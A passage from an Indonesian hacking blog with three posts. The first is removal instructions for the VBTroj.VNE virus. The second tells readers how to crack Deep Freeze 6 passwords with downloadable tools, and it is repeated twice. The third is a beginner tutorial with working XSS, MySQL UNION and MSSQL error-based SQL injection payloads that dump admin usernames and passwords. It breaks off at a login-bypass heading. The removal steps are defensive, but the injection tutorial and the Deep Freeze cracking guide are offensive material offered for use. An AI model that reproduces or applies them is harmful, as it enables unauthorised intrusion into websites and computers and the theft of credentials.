Dari sekian aksi yang dilakukan di atas, virus ini mempunyai satu tujuan yakni untuk menguasai komputer target dengan cara memblok agar user tidak dapat mengakses komputer sebelum virus tersebut dibersihkan. Untuk melakukan hal ini ia akan mengganti wallpaper/desktop dengan wallpaper dirinya yang berisi pesan Error serta menampilkan pesan-pesan lainnya. Oleh karena itu pembersihan melalui “safe mode” atau “safe mode with command prompt” pun tidak akan mampu menyingkirkan virus ini kecuali jika pembersihan dilakukan pada mode “DOS” atau menggunakan software lain, contohnya dengan menggunakan Windows Mini PE [www.minipe.org]

Microsoft
Cara membersihkan W32/VBTroj.VNE

Karena virus ini tidak bisa di bersihkan baik pada mode “safe mode” atau “safe mode with command prompt” maka sebaiknya pembersihan dilakukan pada mode DOS atau dengan menggunakan software lain seperti Bart PE atau Mini PE dimana pembersihan ini dapat dilakukan secara manual atau dengan menjalankan removal tools [jika sudah mengenali]



Untuk pembersihan kali ini, kita akan menggunakan software Mini PE, silahkan download tools tersebut di alamat www.minipe.org, kemudian burn ke CD dan booting komputer dengan menggunakan CD tersebut. Setelah berhasil booting dengan menggunakan CD tersebut lakukan langkah pembersihan selanjutnya.

Error

1.

Hapus file virus di drive

Gunakan tools [Windows explorer] untuk memudahkan dalam mencari dan menghapus file induk virus.



- Klik [miniPE2XT]

- Klik [Programs]

- Klik [File Management]

- Klik [Windows Explorer]



Kemudian hapus file berikut:



o [C:\] atau Drive lain termasuk Flash disk

o C:\Windows

o C:\Windows\system32

o C:\Documents and Settings\%user%\Application Data%angka%Admin.exe



[Contoh: Application Data90Admin.exe]



o C:\Documents and Settings\%user%\Local Settings\Application Data%angka%r13y5h4ku.exe



[Contoh: Application Data90r13y5h4ku.exe]



o C:\Documents and Settings\%user%\Start Menu\Programs\Startup%angka%AVG Test Center.exe



[Contoh: Startup90AVG Test Center.exe] 26 files

o C:\Documents and Settings\win321.exe

o C:\WINDOWS\Web\Printers\Write.exe

o C:\WINDOWS\Web\download.exe

o C:\Windows\Cursors\newCursor.exe

o C:\Windows\Debug\adminMode.exe

o C:\Windows\Font\rieyshaTrueType.exe

o C:\Windows\Help\userhelping.exe

o C:\Windows\java\packet.exe

o C:\Windows\Media\newmedia.exe

o C:\Windows\msagent\agentkvr.exe

o C:\Windows\registration\registy.exe

o C:\Windows\repair\setup.exe

o C:\windows\tasks\newScedule.exe

o C:\windows\system32\win34.exe

o C:\WINDOWS\system\oeminfo.exe

o C:\Windows\softwaredistribution\downloads.exe

o C:\Program Files\Internet Explorer

hacker.exe

IEfree.exe



Catatan:

Hapus file virus yang mempunyai ciri-ciri:

- Menggunakan icon
Microsoft

Ukuran 228 KB

- Type file “Application”

- Ekstensi EXE



Untuk mempercepat pencarian sebaiknya menggunakan tools pencarian [Search], caranya:

- Buka [Windows Explorer]

- Klik tombol [Search]

- Pada kolom "Search for files or folders names" isi dengan format *.exe

- Pada kolom "Look in:" pilih drive yang akan di periksa

- kKik opsi [Search Options >>]

- Pilih opsi "Size"

§ Pilih "At most"

§ Isi 229

- Klik opsi "Advanced Options"

§ Pilih opsi "Search System folders"

§ Pilih opsi "Search hidden files and folders"

§ Pilih opsi "Search subfolders"

- Klik tombol "Search Now" untuk memulai pencarian

- Kemdian hapus file virus yang berhasil ditemukan sesai dengan ciri-ciri yang telah disebutkan di atas.



Hapus juga file berikut:



- C:\CeweNakal.scr

- C:\Windows

§ Oemlogo.pif

§ TAKSMAN.com

§ system32folder.htt

§ system32desktop.ini

§ system32pesan_dari_rieysha.txt

§ system32pesan.doc

§ system32Autorun.inf

§ system32pesanku.bat

§ system32pesanQ.htm

§ system32klikAku.bat

§ system32klik2kali.bat

§ system32rieysha.jpg

- D:\Puisi.txt

2.

Hapus/edit kembali registry yang sudah diubah virus

o Masih di Mini PE, klik

o Klik MiniPE2XT]

o Klik [Programs]

o Klik [Avast! Registry Editor]

o Klik [Registry Editor]

o Setelah muncul layar [Select File With Registry], klik tombol [Load selected OS registry], jika muncul layar konfirmasi, klik tombol [OK]

Microsoft

o Kemudian cari dan ubah registry berikut:

- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon



§ Klik 2x pada string [Shell], kemudian pada kolom “string value data” ubah menjadi [explorer.exe], Kemudian klik tombol [OK]



§ Klik 2x pada string [Userinit], kemudian pada kolom “string value data” ubah menjadi [%System%:\userinit.exe,], Kemudian klik tombol [OK]



Catatan:

%system% ini berbeda-beda:

· [C:\Windows\system32] à Windows XP/2003

· [C:\Winnt\system32] à Windows 2000



- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Run

§ Hapus string [r13y5h4.exe]



- _LOCAL_MACHINE_SYSTEM\ControlSet001\Control\SafeBoot

§ Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]



- _LOCAL_MACHINE_SYSTEM\ControlSet002\Control\SafeBoot

§ Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]



- _LOCAL_MACHINE_SYSTEM\CurrentControlSet\Control\SafeBoot

§ Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]



- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, kemudian hapus string berikut:

§ Explorer



- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer, kemudian hapus string berikut:



§ NoClose

§ NoDrives

§ NoDriveTypeAutoRun

§ NoFind

§ NoFolderOptions

§ NoRun

§ NoStarMenuMorePrograms

§ NoViewOnDrive



- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, kemudian hapus string berikut:



§ DisableCMD

§ DisableRegistryTools

§ DisableTaskMgr



- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer, kemudian hapus string berikut:



§ NoCLose

§ NoControlPanel

§ NoDrives

§ NoFind

§ NoFolderOptions

§ NoLOgoff

§ NoRun

§ NoSetFolders

§ NoTrayContextMenu

§ NoViewOnDrive

§ NoWindowsUpdate

§ StartMenuLogOff



- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, kemudian hapus string berikut:



§ NoDispCPL

§ DisableRegistryTools

§ DisableTaskMgr



- _LOCAL_MACHINE_SOFTWARE\Microsoft\WindowsNT

§ Pada string [RegisteredOrganization] ubah “string value data” sesuai dengan keinginan Anda

§ Pada string [RegisteredOwner] ubah “string value data” sesuai dengan keinginan Anda



- _USER_%user%Software\Microsoft\Windows\CurrentVersion\Run

§ Hapus string [r13y5h4.exe]



- _User_%user%\Software\Microsoft\Internet Explorer\Main

§ Pada string [Start Page] ubah “string value data” menjadi [about:blank]



- _User_%user%\Control Panel\International

§ Pada string [s1159] ubah “String value data” menjadi [AM]

§ Pada string [s2359] ubah “string value data” menjadi [PM]



3.

Restart komputer
4.

Fix ulang registry untuk memastikan semua registry sudah di perbaiki, silahkan copy script dibawah ini pada program “notepad” kemudian simpan dengan nama repair.inf



Catatan

Jalankan file repair.inf ini setelah komputer restart



Berikut script yang harus di copy



[Version]

Signature="$Chicago$"

Provider=Vaksincom Oyee



[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del



[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""

HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"

HKCU, Control Panel\Desktop, Wallpaper,0,

HKCU, Software\Microsoft\Internet Explorer\Main, Start Page,0, "about:blank"

HKCU, Control Panel\International, s1159,0, "AM"

HKCU, Control Panel\International, s2359,0, "PM"

HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKLM, SOFTWARE\Classes\exefile,,,application

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, RegisteredOrganization,0, "Organization"

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, RegisteredOwner,0, "Owner"

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255





[del]

HKCU, Softawre\microsoft\Windows\currentVersion\Run, r13y5h4.exe

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies, explorer

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoRecentDocsMenu

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoRun

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFind

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoTrayContextMenu

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoViewContextMenu

HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoClose

HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoDrives

HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoStarMenuMorePrograms

HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoViewOnDrive

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoClose

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoControlPanel

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoDrives

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoFind

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoFolderOptions

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoLogoff

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoRun

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoSetFolders

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoTrayCOntextMenu

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoViewOnDrive

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoWindowsUpdate

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoStartMenuLogoff

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,NoDispCPL

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,DisableRegistryTools

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,DisableTaskMgr

HKCU, Software\Microsoft\Internet Explorer\Main, Window Title

5.

Restart komputer, kemudian login tanpa menggunakan CD Mini PE
6.

Jalankan repair.inf untuk membersihkan registry yang sudah di buat/diubah oleh virus caranya:



o Klik kanan repair.inf

o Klik Install


(+) Baca Selanjutnya...

Jumat, 30 Oktober 2009

Cara Mudah Menjebol Password Deep Freeze 6

Sesuai dengan dinamika dan perkembangan jaman - banyak tips dan tools baru bermunculan ternyata termasuk juga untuk teknik untuk menjebol password Deep Freeze. Jika sebelumnya ada unfreezer untuk

Deepfreeze 5 tetapi reset password harus dilakukan secara manual untuk Deepfreeze 6, maka sekarang ini beberapa tools penjebol password bahkan sudah bisa dipake untuk mereset password Deep Freeze versi 6 dengan sedemikian mudah dan cepat.

Kalau anda admin warnet dan sebangsanya, saya sarankan anda mengikuti perkembangan ini, karena tools ini benar-benar lumayan mengerikan. Bahkan kesan saya malah lebih mak nyus dari Unfreezer untuk DF 5.

Ada dua tools setidaknya setahu saya yang bisa dipakai untuk menjebol password DF 6 nyaris dengan seketika tanpa perlu susah payah. Ngeri deh
TOOLS PERTAMA bernama Anti Deepfreeze, kelihatannya karya programmer Arab.

Tampilannya seperti ini :
Deep Freze 10.0
Cara menggunakannya sangat mudah, Tinggal pilih versi Deepfreeze lalu klik tombol Apply. Kemudian klik gambar icon Deepfreeze di taskbar ( Ctrl + Shift ) sambil klik icon .

Jika ada kotak password biarkan kosong, langsung masuk saja. Anda akan dibiarkan masuk konfigurasi Deepfreeze tanpa password

TOOLS KEDUA bernama Uninstall Deepfreeze, karya programmer Vietnam. Kalo program sebelumnya pake bahasa Inggris , program yang ini berbahasa Vietnam.

Tampilannya seperti ini :
Deep freze
Cara memakainya juga mudah meskipun berbahasa Vietnam, klik tombol Login, sampai tombol Login tidak aktif dan tombol Crack berubah menjadi aktif. Kemudian klik tombol Crack.

Langkah selanjutnya sama. Masuk ke file konfigurasi DeepFreeze dengan Ctrl+ Shift + klik icon DF atau cara lain. Bila ada kotak password abaikan, langsung masuk saja.

Semua cara ini dilakukan di Normal Windows, tetapi memang butuh restart komputer.
Sekali lagi, karena potensi dua tools ini agak tidak mengenakkan buat admin warnet cs, saya himbau rekan2 admin lebih memperhatikan masalah ini dengan menambah proteksi DF dengan tools yang lain. Meskipun
memang yang namanya program apapun tetap ada kemungkinan ditembus passwordnya.
=================================================================
Download dua tools tersebut di sini

http://www.ziddu.com/download/6798049/DeepfreezeManisx.zip.html


Gunakanlah alat bantu ini dengan bijaksana

Sesuai dengan dinamika dan perkembangan jaman - banyak tips dan tools baru bermunculan ternyata termasuk juga untuk teknik untuk menjebol password Deep Freeze. Jika sebelumnya ada unfreezer untuk

Deepfreeze 5 tetapi reset password harus dilakukan secara manual untuk Deepfreeze 6, maka sekarang ini beberapa tools penjebol password bahkan sudah bisa dipake untuk mereset password Deep Freeze versi 6 dengan sedemikian mudah dan cepat.

Kalau anda admin warnet dan sebangsanya, saya sarankan anda mengikuti perkembangan ini, karena tools ini benar-benar lumayan mengerikan. Bahkan kesan saya malah lebih mak nyus dari Unfreezer untuk DF 5.

Ada dua tools setidaknya setahu saya yang bisa dipakai untuk menjebol password DF 6 nyaris dengan seketika tanpa perlu susah payah. Ngeri deh
TOOLS PERTAMA bernama Anti Deepfreeze, kelihatannya karya programmer Arab.

Tampilannya seperti ini :
Deep Freze 10.0
Cara menggunakannya sangat mudah, Tinggal pilih versi Deepfreeze lalu klik tombol Apply. Kemudian klik gambar icon Deepfreeze di taskbar ( Ctrl + Shift ) sambil klik icon .

Jika ada kotak password biarkan kosong, langsung masuk saja. Anda akan dibiarkan masuk konfigurasi Deepfreeze tanpa password

TOOLS KEDUA bernama Uninstall Deepfreeze, karya programmer Vietnam. Kalo program sebelumnya pake bahasa Inggris , program yang ini berbahasa Vietnam.

Tampilannya seperti ini :
Deep freze
Cara memakainya juga mudah meskipun berbahasa Vietnam, klik tombol Login, sampai tombol Login tidak aktif dan tombol Crack berubah menjadi aktif. Kemudian klik tombol Crack.

Langkah selanjutnya sama. Masuk ke file konfigurasi DeepFreeze dengan Ctrl+ Shift + klik icon DF atau cara lain. Bila ada kotak password abaikan, langsung masuk saja.

Semua cara ini dilakukan di Normal Windows, tetapi memang butuh restart komputer.
Sekali lagi, karena potensi dua tools ini agak tidak mengenakkan buat admin warnet cs, saya himbau rekan2 admin lebih memperhatikan masalah ini dengan menambah proteksi DF dengan tools yang lain. Meskipun
memang yang namanya program apapun tetap ada kemungkinan ditembus passwordnya.
=================================================================
Download dua tools tersebut di sini

http://www.ziddu.com/download/6798049/DeepfreezeManisx.zip.html


Gunakanlah alat bantu ini dengan bijaksana
(+) Baca Selanjutnya...

Minggu, 25 Oktober 2009

simple basic common web attack

halo kawan-kawan semuanya, ini sebenernya gue pesembahkan buat devilzc0de yang sedang mengalami guncangan dari pihak asink(cie,cie bahasanya), maksudnya ini gue tulis ketika devilzc0de sedang mengalami suspend diforumnya, semoga ini cepat berlalu dan Devilzc0de cepet exist kembali, terima kasih buat temen2 yang udeh mau bantu berdirinya Devilzc0de sampe saat ini, w cinta loh semuanya, kita adalah familly.
ok, kawan2 langsung saja dari pada tunggu lama, tr malah kesel lagi lama2 w curhat...

oh yah, kenapa gue bisa pilih judul kaya diatas, karena ada buku yang judulnya web attack, nah disni gue cuma mempersimpel jah, bhkan ini basic sekali buat para pemula,bagi yang sudah bisa silahkan tidak usah dibaca tutorial cupu w ok, bagi yang mau baca silahkan aja.

dalam tutorial kali ini w akan membahas beberapa serangan yang sering dilakukan oleh para attacker web atau dengan kata lain tester web:

1.XSS (Cross site scripting)
2.basic SQL injection
3.SQL injection for ASP
4.bypass login
5.File Inclusion (RFI/LFI)
6.RCE (Remote Command Execution)

ok langsung saja kita menuju TKP juragan


0x01::XSS (cross site scripting)

nah loh apa itu??? itu adalah XSS (cross site scripting), wah kenapa namanya bukan jadi CSS???, wah pinter nih , gini loh karena CSS sendiri sudah memiliki arti yakni Cascading style sheet, nah nanti kalo pk singkatan itu jadi rancu donk,hehehe, yah pokoknya begitulah dari yang w pernah tahu n baca,kalo ada yang mau cari lagi silahkan jah kenapa namanya demikia, kalo w sih males, lebih baik langsung ngerti, xii,xii...

XSS adalah satu teknik web attack yang sangat mudah sekali dilakukan, ibaratnya, bug ini adalah sederhana karena attacker hanya menampilkan script yang tertulis di URL addressnya, wah gimana tuh...???? ok, langsung praktek saja

example:

http://namasite.com/aduh.php?xss=welcome+to+mysite

nah dari situ biasanya kita tahu baha web tesebut terkena vulnerable XSS, dari situ kita bisa memainkan URL tersebut menjadi:

example:

http://namasite.com/aduh.php?xss=alert(kamu ganteng deh)

nah nanti bisa kita rubah seperti itu,nanti setelah kita tekan enter maka akan keluar javascript alert dengan tulisan "kamu ganteng deh",hehehe


0x02::SQL injection

nah ini mungkin udeh pada tahu, atau mungkin udeh banyak yang mngerti metode ini, kalo udeh ada silahkan saja yah dilewadkan,, ini juga serangan attacker yang sering kali digunakan, karena masih banyak sekali site yang vulnerable dengan metode ini, sebelum lebih jauh membahas metode yang satu ini, g ada salahnya kita berkenalan dengan metode ini, karena ada pepatah, ga kenal maka g tahu(jayus loh..gpp yang penting metal..:p).

gini loh, sql injection adalah metode web attack dengan melakukan pemberian karakter2 khusus diURL target, jihaha, apalagi itu, saya g ngerti @#$%!@#...wets, sabar donk om, ini mau dikasih contoh, gini loh om, biasanya web tersebut di URLnya diberikan tanda quote,

example:

http://serang.org.sql.php?inject=20'

nah kan diberikan tanda petik tuh, kalo ada pesan error, berarti web tersebut vulnerable dengan sql injection

kemudian kita bisa mencari kolom keberapa yang mengalami masalah

example:

http://serang.org/sql.php?injection=10 order by 1--

example:

http://serang.org/sql.php?injection=10 order by 5--

atau juga bisa mencari dengan metode lain:

example:

http://serang.org/sql.php?injection=-10 union all select 1--

example:
http://serang.org/sql.php?injection=-10 union all select 1,2--

example:
http://serang.org/sql.php?injection=-10 union all select 1,2,3--

dan seterusnya

atau juga bisa

example:

http://serang.org/sql.php?injection=10 and 1=2 union all select 1--

example:

http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2--

example:

http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2,3--

dan seterusnya sampe keluar kolom yang bermasalahnya ok...
nah kalo gitu, karena ini cuma contoh,kita anggap yang keluar adalah kolom ke 3

setelah itu kita bisa mengecek versi sqlnya

example:

http://serang.org/sql.php?injection=-10 union all select 1,2,version(),4,5--

atau

example:

http://serang.org/sql.php?injection=-10 union all select 1,2,@@version,4,5--

kalo seandainya yang keluar versi 4.x.x, maka lewadkan saja, kalo mau dipaksa bisa sih, tapi harus tebak2 tabel dan kolom,hehehe, kalo seandainya yang keluar versi 5.x.x , mari lanjutkan.

untuk mencari tabel yang terdapat dalam site tersebut

example:

http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databasae()--

inget file yang penting adalah:

>>group_concat(table_name)<< == untuk mencari table dari database yang ada.

>>from information_schema.tables where table_schema=database << == diletakan di angka terakhir yang kita dapatkan (lihad contoh diatas)

ok, sekarang kita dapet tabelnya nih, misalnya isi tabelnya sebagai berikut:
admin
user
forum
berita
polling

nah stelah dapet itu selanjutnya kita harus tahu, apa saja sih yang ada didalam tabel itu, tapi tabel yang ingin dicari harus terlebih dahulu kita konvert ke ASCII

example:

http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--

61646D696E = admin = dari string kita rubah ke ASCII dengan menambahkan 0xASCII

setelah kita dapet kolomnya, sekarang saatnya kita dump itu kolom, misalkan kolom yang terdapat pada tabel adalah:
id
username
password
email

nah kan udeh tahu kan, dumping deh

example:

http://serang.org/sql.php?injection=-10 union all select group_concat(id,0x3a,username,0x3a,password,0x3a,email) from admin--

nah selesai deh, username n password ada ditangan anda, kalo seandainya password yang kita dapet di encrypt dengan md5 silahkan crack saja yah, banyak ko crackan buat md5 yang online tool sekarang..kalo saya sih lebih suka pake toolnya si gunslinger yang md5 cracking, enak tuh...sering dapet..sekalian w promosiin gunslinger tool loh, ok, setelah berhasil di crack atau dapet password dan usernamenya, silahkan cari halaman adminnya, kalo males, pk tool adminpagefinder dari gunslinger juga, sayang toolnya lum bisa update pagenya...hehe, tr kapan2 kita renov ya gunslinger.

0x03::SQL injection for ASP

sebernernya ini sama saja dengan metode SQL injection yang diatas, tapi bedanya hanya dibahasa yang digunakan, kalo yang diatas biasa di pk untuk *.php dan kalo yang ini untuk *.asp..

example:

http://inject.web.id/sql.asp?injection=12'

kalo muncul pesan error kaya gini "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/news.asp, line 52" berarti bisa kita lanjutkan, selain dari itu, coba2 ajah ok...hehehehe :p

lanjutkan dengan

example:

http://inject.web.id/sql.asp?injection=12' HAVING 1=1--

error "Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in the select list because it is not contained in an aggreate function and there is no GROUP BY clause."

cari lagi table dan kolomnya

example:

http://inject.web.id/sql.asp?injection=12' GROUP BY news.news_id HAVING 1=1--

error "Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in the select list because it is not contained in an aggreate function and there is no GROUP BY clause."

Error menunjukkan nama column yang ketiga adalah "news_detail"
Untuk mencari nama column yang seterusnya, lakukan seperti langkah selanjutnya dengan menambahkan urutan nama-nama column.
Jika pada akhirnya tidak muncul error, berarti sudah tidak ada lagi column yang di dalam table.

Selanjutnya kita akan menggunakan metode yang lain untuk memanfaatkan error MSSQL dengan command "convert".
Contoh command yang akan ditambahkan diakhir URL (setelah parameter id) adalah: +and+1=convert(int,perintah)--
contoh kita akan melihat versi server:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,@@version)--

Pesan error yang muncul:

Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to data type int.
/page.asp, line 9

Dari error tersebut kita mengetahui versi Microsoft SQL dan OS-nya.

Untuk mencari nama databasenya

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,db_name())--

Error yang dihasilkan:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwhdb' to data type int.
/page.asp, line 9

Berdasarkan error maka dapat diketahui bahwa nama database adalah "cwhdb"

Untuk melihat user yang sementara menggunakan database gunakan command user_name(). contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,user_name())--

Error yang dihasilkan:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'sa' to data type int.
/showthread.asp, line 9

Error menunjukkan bahwa user adalah "sa"

Sekarang adalah bagaimana mencari nama table, nama column, dan isinya, dari table information_schema. Perintahnya: +and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- >>contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--

Error yang dihasilkan:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'threads' to data type int.
/page.asp, line 9

Dari query tersebut, dapat diketahui bahwa "threads" sebagai tipe data nvarchar dan tidak bisa diconvert ke data tipe int, maka menghasilkan error.
Dan dengan error tersebut, menunjukkan table yang pertama adalah table "threads".
Selanjutnya mencari table yang kedua. Dengan menambahkan perintah WHERE. contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads')))--

/*Penjelasan perintah tersebut, yaitu kita akan mengambil informasi dari table information_schema dimana/dengan nama table tidak/bukan "threads". Atau dengan kata lain kita akan mencari table yang selain table "threads"*/
Maka akan muncul error:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'users' to data type int.
/page.asp, line 9

Error menunjukkan table yang kedua adalah "users". Untuk mencari table yang lain, hanya tambahkan nama table yang telah diketahui. contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads','users')))--

Error yang muncul:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'forums' to data type int.
/page.asp, line 9

Yang berarti nama table yang ketiga adalah table "forums"
Namun jika error yang tampil seperti ini:

ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10

Maka menandakan bahwa semua table telah ditampilkan dan sudah tidak ada lagi table yang lain.

Selanjutnya mencari nama column dari table. Metodenya hampir sama dengan yang sebelumnya, yaitu masih mencari dari "information_schema" namun perintahnya dari "information_schema.tables" berubah menjadi "information_schema.columns" dan dari "table_name" berubah menjadi "column_name". contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'))--

Menampilkan error:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9

Dan berdasarkan error diketahui isi column pertama dari table "users" adalah column "uname".
Untuk mencari column yang lain gunakan perintah di akhir URL: and+column_name+not+in+('uname'). contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname')))--

Menghasilkan error:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9

Berdasarkan error, column yang kedua adalah column "upass" yang terdapat dari table "user".
Untuk mencari column yang lain, tambahkan nama column yang telah kita ketahui sebelumnya. contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname','upass')))--

Muncul error:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'email' to data type int.
/showthread.asp, line 9

Berarti column yang ketiga adalah column "email".
Tetapi jika error yang dihasilkan adalah:

ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10

Itu menandakan bahwa sudah tidak ada lagi column yang lain.

Last step, adalah mencari isi dari column yang telah kita ketahui. Seperti ini:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+uname+from+users))--

Error yang muncul:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9

Berarti isi dari column "uname" yang berada di table "users" datanya adalah "admin".
Untuk mencari user yang lain, gunakan data yang telah kita ketahui. contoh:

example:

http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin')))--

Jika error yang muncul:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwh' to data type int.
/page.asp, line 9

Berarti username yang lain adalah "cwh". Dan untuk mencari user yang berikutnya, tambahkan username yang telah diketahui. contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')))--

Dan jika errornya:

ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/showthread.asp, line 10

Berarti hanya ada 2 user yaitu "admin" dan "cwh".

Dan untuk mencari passwordnya, perintahnya seperti:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+upass+from+users))--

Dan jika error yang ditampilkan adalah:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value '123' to data type int.
/page.asp, line 9

Maka isi dari data yang pertama di column "upass" adalah "123".
Dari hasil yang kita dapat diatas, isi data pertama dari column "uname" adalah "admin", dan isi data pertama dari column "upass" adalah "123".
Berarti usernamenya adalah "admin" dan passwordnya "123"

0x04::bypass Login

